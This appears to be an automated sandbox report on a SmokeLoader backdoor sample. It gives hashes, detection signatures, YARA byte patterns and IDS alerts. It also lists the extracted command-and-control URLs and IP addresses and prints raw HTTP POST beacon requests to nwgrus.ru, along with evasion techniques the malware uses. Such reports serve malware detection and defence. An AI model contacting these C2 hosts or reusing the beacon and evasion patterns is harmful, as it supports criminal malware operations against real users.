Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1HGXcC63iu.exe

Overview

General Information

Sample name:1HGXcC63iu.exe
renamed because original name is a hash value
Original sample name:8320df18fc9660f3a4dcaa29b3707847.exe
Analysis ID:1532852
MD5:8320df18fc9660f3a4dcaa29b3707847
SHA1:1ec0afcceae9b6b0a771f28002b3617d45d5ab56
SHA256:ce39271335727cb252102e59f53dedb8880fb3dca8f597bdf7e5d35c6d605de0
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 1HGXcC63iu.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\1HGXcC63iu.exe" MD5: 8320DF18FC9660F3A4DCAA29B3707847)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • scjabht (PID: 7684 cmdline: C:\Users\user\AppData\Roaming\scjabht MD5: 8320DF18FC9660F3A4DCAA29B3707847)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x33aa:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 7 entries

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\scjabht, CommandLine: C:\Users\user\AppData\Roaming\scjabht, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\scjabht, NewProcessName: C:\Users\user\AppData\Roaming\scjabht, OriginalFileName: C:\Users\user\AppData\Roaming\scjabht, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\scjabht, ProcessId: 7684, ProcessName: scjabht
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-14T01:52:27.352704+020020391031A Network Trojan was detected192.168.2.449736189.161.95.10380TCP
      2024-10-14T01:52:28.476787+020020391031A Network Trojan was detected192.168.2.449737189.161.95.10380TCP
      2024-10-14T01:52:29.578063+020020391031A Network Trojan was detected192.168.2.449738189.161.95.10380TCP
      2024-10-14T01:52:30.712318+020020391031A Network Trojan was detected192.168.2.449739189.161.95.10380TCP
      2024-10-14T01:52:31.846797+020020391031A Network Trojan was detected192.168.2.449740189.161.95.10380TCP
      2024-10-14T01:52:32.943368+020020391031A Network Trojan was detected192.168.2.449741189.161.95.10380TCP
      2024-10-14T01:52:34.066205+020020391031A Network Trojan was detected192.168.2.449742189.161.95.10380TCP
      2024-10-14T01:52:35.284563+020020391031A Network Trojan was detected192.168.2.449743189.161.95.10380TCP
      2024-10-14T01:52:36.394921+020020391031A Network Trojan was detected192.168.2.449744189.161.95.10380TCP
      2024-10-14T01:52:37.513650+020020391031A Network Trojan was detected192.168.2.449745189.161.95.10380TCP
      2024-10-14T01:52:38.616273+020020391031A Network Trojan was detected192.168.2.449746189.161.95.10380TCP
      2024-10-14T01:52:39.978543+020020391031A Network Trojan was detected192.168.2.449747189.161.95.10380TCP
      2024-10-14T01:52:41.229308+020020391031A Network Trojan was detected192.168.2.449748189.161.95.10380TCP
      2024-10-14T01:52:42.343624+020020391031A Network Trojan was detected192.168.2.449749189.161.95.10380TCP
      2024-10-14T01:52:43.461849+020020391031A Network Trojan was detected192.168.2.449750189.161.95.10380TCP
      2024-10-14T01:52:44.586287+020020391031A Network Trojan was detected192.168.2.449751189.161.95.10380TCP
      2024-10-14T01:52:45.701213+020020391031A Network Trojan was detected192.168.2.449752189.161.95.10380TCP
      2024-10-14T01:52:46.817207+020020391031A Network Trojan was detected192.168.2.449753189.161.95.10380TCP
      2024-10-14T01:52:47.922152+020020391031A Network Trojan was detected192.168.2.449754189.161.95.10380TCP
      2024-10-14T01:52:49.045985+020020391031A Network Trojan was detected192.168.2.449755189.161.95.10380TCP
      2024-10-14T01:52:50.193029+020020391031A Network Trojan was detected192.168.2.449756189.161.95.10380TCP
      2024-10-14T01:52:51.533325+020020391031A Network Trojan was detected192.168.2.449757189.161.95.10380TCP
      2024-10-14T01:52:52.671964+020020391031A Network Trojan was detected192.168.2.449758189.161.95.10380TCP
      2024-10-14T01:52:53.788983+020020391031A Network Trojan was detected192.168.2.449759189.161.95.10380TCP
      2024-10-14T01:52:54.895988+020020391031A Network Trojan was detected192.168.2.449760189.161.95.10380TCP
      2024-10-14T01:52:56.000150+020020391031A Network Trojan was detected192.168.2.449761189.161.95.10380TCP
      2024-10-14T01:52:57.098914+020020391031A Network Trojan was detected192.168.2.449762189.161.95.10380TCP
      2024-10-14T01:52:58.208548+020020391031A Network Trojan was detected192.168.2.449763189.161.95.10380TCP
      2024-10-14T01:52:59.308215+020020391031A Network Trojan was detected192.168.2.449766189.161.95.10380TCP
      2024-10-14T01:53:00.410405+020020391031A Network Trojan was detected192.168.2.449772189.161.95.10380TCP
      2024-10-14T01:53:01.541617+020020391031A Network Trojan was detected192.168.2.449783189.161.95.10380TCP
      2024-10-14T01:53:02.669552+020020391031A Network Trojan was detected192.168.2.449789189.161.95.10380TCP
      2024-10-14T01:53:03.768388+020020391031A Network Trojan was detected192.168.2.449797189.161.95.10380TCP
      2024-10-14T01:53:04.909931+020020391031A Network Trojan was detected192.168.2.449806189.161.95.10380TCP
      2024-10-14T01:53:06.098599+020020391031A Network Trojan was detected192.168.2.449812189.161.95.10380TCP
      2024-10-14T01:54:18.022227+020020391031A Network Trojan was detected192.168.2.45003758.151.148.9080TCP
      2024-10-14T01:54:25.117522+020020391031A Network Trojan was detected192.168.2.45003858.151.148.9080TCP
      2024-10-14T01:54:31.240510+020020391031A Network Trojan was detected192.168.2.45003958.151.148.9080TCP
      2024-10-14T01:54:37.062971+020020391031A Network Trojan was detected192.168.2.45004058.151.148.9080TCP
      2024-10-14T01:54:43.976866+020020391031A Network Trojan was detected192.168.2.45004158.151.148.9080TCP
      2024-10-14T01:54:50.199292+020020391031A Network Trojan was detected192.168.2.45004258.151.148.9080TCP
      2024-10-14T01:54:56.990013+020020391031A Network Trojan was detected192.168.2.45004358.151.148.9080TCP
      2024-10-14T01:55:03.109844+020020391031A Network Trojan was detected192.168.2.45004458.151.148.9080TCP
      2024-10-14T01:55:09.950050+020020391031A Network Trojan was detected192.168.2.45004558.151.148.9080TCP
      2024-10-14T01:55:17.944120+020020391031A Network Trojan was detected192.168.2.45004658.151.148.9080TCP
      2024-10-14T01:55:24.265967+020020391031A Network Trojan was detected192.168.2.45004758.151.148.9080TCP
      2024-10-14T01:55:30.261756+020020391031A Network Trojan was detected192.168.2.45004858.151.148.9080TCP
      2024-10-14T01:55:37.612387+020020391031A Network Trojan was detected192.168.2.45004958.151.148.9080TCP
      2024-10-14T01:55:44.030057+020020391031A Network Trojan was detected192.168.2.45005058.151.148.9080TCP
      2024-10-14T01:55:51.158024+020020391031A Network Trojan was detected192.168.2.45005158.151.148.9080TCP
      2024-10-14T01:55:56.961550+020020391031A Network Trojan was detected192.168.2.45005258.151.148.9080TCP
      2024-10-14T01:56:03.563735+020020391031A Network Trojan was detected192.168.2.45005358.151.148.9080TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
      Source: C:\Users\user\AppData\Roaming\scjabhtReversingLabs: Detection: 34%
      Source: 1HGXcC63iu.exeReversingLabs: Detection: 34%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\scjabhtJoe Sandbox ML: detected
      Source: 1HGXcC63iu.exeJoe Sandbox ML: detected
      Source: 1HGXcC63iu.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49762 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49783 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49812 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49806 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49797 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49789 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50043 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50037 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 189.161.95.103:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50039 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50038 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50050 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50052 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50051 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50053 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50042 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50047 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50045 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50044 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50046 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50048 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 58.151.148.90:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50049 -> 58.151.148.90:80
      Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 189.161.95.103 80Jump to behavior
      Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
      Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
      Source: Joe Sandbox ViewIP Address: 58.151.148.90 58.151.148.90
      Source: Joe Sandbox ViewASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
      Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dylagwrgixlfmu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ibgfkpdryxjpgnqh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eantthlyjjcdj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://shpbhnktrtag.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wcfffybtpterbqpa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnobteannnesvysc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tapxxmacigntnnfe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vammwtwbjec.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akhsodkspgrml.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tsjfluqkxyqldltv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xiohrwbimqciogt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omlvjsbjwgbtt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vsbjnemdwavwq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lothfyrshwumy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://minslgtmvtn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ccnaltwqqqsxov.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://stlewbfilnqojsrv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egmeddtwjwiedt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gklgbytfsyxm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aovitjibeagnbys.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://snussmiqvhuxlm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lldjdgortos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syoedasuherii.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://njefqjlwqiadunh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdojljspnss.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eodrfdbgkbdgmox.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cguufeaxdioixvo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbtkpieyfdv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nannolqtxvdvgf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjnfdjwducxdwna.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
